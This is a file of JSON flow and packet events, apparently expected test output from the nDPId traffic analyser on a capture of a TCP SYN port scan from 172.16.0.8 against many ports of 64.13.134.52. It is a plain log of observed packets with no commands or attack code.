-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsLm4AADIG6ASsEAAIQA2GNIzSIyLdUoMYAAAAAGACDAAJbQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsZG4AADUGrwSsEAAIQA2GNIzSCV\/dUoMYAAAAAGACCAAnMAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1048,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsqyIAACsGclCsEAAIQA2GNIzSDfzdUoMYAAAAAGACEAAakwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsXvEAADYGs4GsEAAIQA2GNIzSAFndUoMYAAAAAGACDAAsNgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1050,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1041,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsT3AAACcG0gKsEAAIQA2GNIzSIqndUoMYAAAAAGACEAAF5gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsjsMAADcGgq+sEAAIQA2GNIzSG8LdUoMYAAAAAGACEAAMzQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1052,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1043,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAs+kwAACcGJyasEAAIQA2GNIzSH5fdUoMYAAAAAGACEAAI+AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1044,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAs9w4AADIGH2SsEAAIQA2GNIzSJXrdUoMYAAAAAGACDAAHFQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1054,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsYMkAADoGramsEAAIQA2GNIzSBEvdUoMYAAAAAGACDAAoRAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1055,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAseVsAACcGqBesEAAIQA2GNIzShw3dUoMYAAAAAGACEAChgQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1056,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1056,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1047,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsAugAACkGHIusEAAIQA2GNIzSE6bdUoMYAAAAAGACCAAc6QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1057,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060072,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1048,"flow_packet_id":1,"flow_last_seen":1278275060072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060072,"pkt":"ACYLMQczACWzv5HuCABFAAAsY\/8AADoGqnOsEAAIQA2GNIzSCo7dUoMYAAAAAGACDAAiAQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsrsYAAC4Ga6ysEAAIQA2GNIzTgA\/dU4MZAAAAAGACDACsfAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1059,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsvEIAADEGWzCsEAAIQA2GNIzTBaPdU4MZAAAAAGACCAAq6QAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1060,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1060,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1051,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAs7Q8AAC0GLmOsEAAIQA2GNIzTTVndU4MZAAAAAGACCADjMgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1061,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5802,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1052,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsVA8AACgGzGOsEAAIQA2GNIzTFqrdU4MZAAAAAGACBAAd4gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1062,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1053,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsbTMAADEGqj+sEAAIQA2GNIzTI3ndU4MZAAAAAGACCAANEwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1063,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1063,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1054,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAspFIAADsGaSCsEAAIQA2GNIzTBHHdU4MZAAAAAGACEAAkGwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1064,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1064,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1055,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsG4AAACwGAPOsEAAIQA2GNIzTB2zdU4MZAAAAAGACBAAtIAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1065,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1065,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsIdAAAC0G+aKsEAAIQA2GNIzTEVvdU4MZAAAAAGACCAAfMQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1066,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1066,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1057,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/2AAACcGIhKsEAAIQA2GNIzTxUTdU4MZAAAAAGACEABjRwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1067,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1067,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsRwMAACYG22+sEAAIQA2GNIzTCizdU4MZAAAAAGACDAAiYAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1068,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1068,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsxZYAADcGS9ysEAAIQA2GNIzTBCPdU4MZAAAAAGACEAAkaQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1069,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1069,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsUyoAACsGykisEAAIQA2GNIzTKXjdU4MZAAAAAGACEAD\/EwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1070,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060115,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1070,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1061,"flow_packet_id":1,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060115,"pkt":"ACYLMQczACWzv5HuCABFAAAsPPsAADQG13esEAAIQA2GNIzTLuDdU4MZAAAAAGACBAAFrAAAAgQFtA=="} 